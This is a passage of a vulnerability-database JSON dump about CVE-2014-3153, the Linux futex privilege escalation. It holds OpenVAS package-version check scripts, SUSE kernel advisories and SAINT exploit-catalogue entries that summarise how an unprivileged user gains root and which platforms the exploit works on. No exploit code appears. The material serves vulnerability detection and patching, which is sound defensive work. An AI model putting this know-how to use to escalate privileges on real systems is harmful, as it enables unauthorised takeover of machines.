rpm:\"kernel-desktop-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel-debuginfo\", rpm:\"kernel-ec2-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-extra\", rpm:\"kernel-ec2-extra~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-extra-debuginfo\", rpm:\"kernel-ec2-extra-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-hmac\", rpm:\"kernel-ec2-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel-debuginfo\", rpm:\"kernel-trace-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-hmac\", rpm:\"kernel-trace-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base-debuginfo\", rpm:\"kernel-vanilla-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel-debuginfo\", rpm:\"kernel-vanilla-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-hmac\", rpm:\"kernel-vanilla-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-hmac\", rpm:\"kernel-xen-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload\", rpm:\"preload~1.2~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload-debuginfo\", rpm:\"preload-debuginfo~1.2~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload-debugsource\", rpm:\"preload-debugsource~1.2~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload-kmp-default\", rpm:\"preload-kmp-default~1.2_3.0.101_87~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload-kmp-default-debuginfo\", rpm:\"preload-kmp-default-debuginfo~1.2_3.0.101_87~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload-kmp-desktop\", rpm:\"preload-kmp-desktop~1.2_3.0.101_87~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload-kmp-desktop-debuginfo\", rpm:\"preload-kmp-desktop-debuginfo~1.2_3.0.101_87~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~3.0.101~87.2\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-hmac\", rpm:\"kernel-pae-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi\", rpm:\"kernel-vmi~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-base\", rpm:\"kernel-vmi-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-base-debuginfo\", rpm:\"kernel-vmi-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-debuginfo\", rpm:\"kernel-vmi-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-debugsource\", rpm:\"kernel-vmi-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-devel\", rpm:\"kernel-vmi-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-devel-debuginfo\", rpm:\"kernel-vmi-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-hmac\", rpm:\"kernel-vmi-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851102", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851102", "type": "openvas", "title": "SUSE: Security Advisory for Linux (SUSE-SU-2014:0837-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851102\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 20:04:21 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for Linux (SUSE-SU-2014:0837-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Linux'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 11 Service Pack 2 LTSS kernel was updated to fix\n a critical security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. This could be used\n for privilege escalation by non-root users. (bnc#880892)\n\n Security Issue reference:\n\n * CVE-2014-3153\n Indications:\n\n Everyone using the Linux Kernel on x86_64 architecture should update.\n\n Special Instructions and Notes:\n\n Please reboot the system after installing this update.\");\n\n script_tag(name:\"affected\", value:\"Linux on SUSE Linux Enterprise Server 11 SP2 LTSS\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0837-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP2\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.1.6_06_3.0.101_0.7.21~0.5.16\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-trace\", rpm:\"xen-kmp-trace~4.1.6_06_3.0.101_0.7.21~0.5.16\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153", "CVE-2013-4483"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-06-09T00:00:00", "id": "OPENVAS:1361412562310841849", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841849", "type": "openvas", "title": "Ubuntu Update for linux-lts-raring USN-2238-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2238_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-raring USN-2238-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841849\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-09 15:08:11 +0530 (Mon, 09 Jun 2014)\");\n script_cve_id(\"CVE-2014-3153\", \"CVE-2013-4483\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-raring USN-2238-1\");\n\n script_tag(name:\"affected\", value:\"linux-lts-raring on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Pinkie Pie discovered a flaw in the Linux kernel's futex\nsubsystem. An unprivileged local user could exploit this flaw to cause a denial\nof service (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nA flaw was discovered in the Linux kernel's IPC reference counting. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (OOM system crash). (CVE-2013-4483)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2238-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2238-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-raring'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.8.0-42-generic\", ver:\"3.8.0-42.62~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:49:16", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "The SUSE Linux Enterprise 11 Service Pack 2 LTSS kernel was updated to fix\n a critical security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. This could be used\n for privilege escalation by non-root users. (bnc#880892)\n", "edition": 1, "modified": "2014-06-24T20:04:13", "published": "2014-06-24T20:04:13", "id": "SUSE-SU-2014:0837-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-06/msg00025.html", "type": "suse", "title": "Security update for Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:42:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "The SUSE Linux Enterprise 11 Service Pack 2 LTSS kernel was updated to fix\n a critical security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. This could be used\n for privilege escalation by non-root users. (bnc#880892)\n", "edition": 1, "modified": "2014-06-25T00:04:51", "published": "2014-06-25T00:04:51", "id": "SUSE-SU-2014:0837-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-06/msg00028.html", "type": "suse", "title": "Security update for Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:14:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "The SUSE Linux Enterprise 11 Service Pack 3 RealTime Extension kernel was\n updated to fix a critical privilege escalation security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. This could be used\n for privilege escalation by non-root users. (bnc#880892)\n", "edition": 1, "modified": "2014-06-14T02:04:20", "published": "2014-06-14T02:04:20", "id": "SUSE-SU-2014:0796-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-06/msg00018.html", "type": "suse", "title": "Security update for Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:57:50", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "The SUSE Linux Enterprise 11 Service Pack 3 kernel was updated to fix a\n critical privilege escalation security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. This could be used\n for privilege escalation by non-root users. (bnc#880892)\n", "edition": 1, "modified": "2014-06-11T05:04:34", "published": "2014-06-11T05:04:34", "id": "SUSE-SU-2014:0775-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-06/msg00014.html", "type": "suse", "title": "Security update for Linux Kernel (critical)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:12", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "kernel update for Evergreen 11.4 fixes local privilege escalation in futex\n code (bnc#880892 / CVE-2014-3153) and a regression causing a crash if\n IPsec peer is unavailable\n\n", "edition": 1, "modified": "2014-07-08T20:04:15", "published": "2014-07-08T20:04:15", "id": "OPENSUSE-SU-2014:0878-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-07/msg00006.html", "type": "suse", "title": "kernel update fixes local privilege escalation and a regression causing a crash if IPsec peer is unavailable (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-05-29T19:19:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "edition": 2, "description": "Added: 12/03/2014 \nCVE: [CVE-2014-3153](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153>) \nBID: [67906](<http://www.securityfocus.com/bid/67906>) \nOSVDB: [107752](<http://www.osvdb.org/107752>) \n\n\n### Background\n\nThe futex system call in Linux provides a mechanism for user-space locking. \n\n### Problem\n\nA vulnerability in the Linux kernel allows an unprivileged user to gain root access using a specially crafted `**futex_requeue**` call. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<https://lists.debian.org/debian-security-announce/2014/msg00130.html> \n\n\n### Limitations\n\nExploit works on CentOS 7 and Red Hat 7 and requires an existing unprivileged shell connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2014-12-03T00:00:00", "published": "2014-12-03T00:00:00", "id": "SAINT:62CFE302E8E036752E595883D6BF6332", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/linux_kernel_futex_requeue", "type": "saint", "title": "Linux kernel futex_requeue privilege elevation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:02", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "description": "Added: 12/03/2014 \nCVE: [CVE-2014-3153](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153>) \nBID: [67906](<http://www.securityfocus.com/bid/67906>) \nOSVDB: [107752](<http://www.osvdb.org/107752>) \n\n\n### Background\n\nThe futex system call in Linux provides a mechanism for user-space locking. \n\n### Problem\n\nA vulnerability in the Linux kernel allows an unprivileged user to gain root access using a specially crafted `**futex_requeue**` call. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<https://lists.debian.org/debian-security-announce/2014/msg00130.html> \n\n\n### Limitations\n\nExploit works on CentOS 7 and Red Hat 7 and requires an existing unprivileged shell connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "edition": 1, "modified": "2014-12-03T00:00:00", "published": "2014-12-03T00:00:00", "id": "SAINT:CC7E2B1599949AEEEB57BA20490CBAFE", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/linux_kernel_futex_requeue", "title": "Linux kernel futex_requeue privilege elevation", "type": "saint", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:38", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "description": "Added: 12/03/2014 \nCVE: [CVE-2014-3153](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153>) \nBID: [67906](<http://www.securityfocus.com/bid/67906>) \nOSVDB: [107752](<http://www.osvdb.org/107752>) \n\n\n### Background\n\nThe futex system call in Linux provides a mechanism for user-space locking. \n\n### Problem\n\nA vulnerability in the Linux kernel allows an unprivileged user to gain root access using a specially crafted `**futex_requeue**` call. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<https://lists.debian.org/debian-security-announce/2014/msg00130.html> \n\n\n### Limitations\n\nExploit works on CentOS 7 and Red Hat 7 and requires an existing unprivileged shell connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "edition": 4, "modified": "2014-12-03T00:00:00", "published": "2014-12-03T00:00:00", "id": 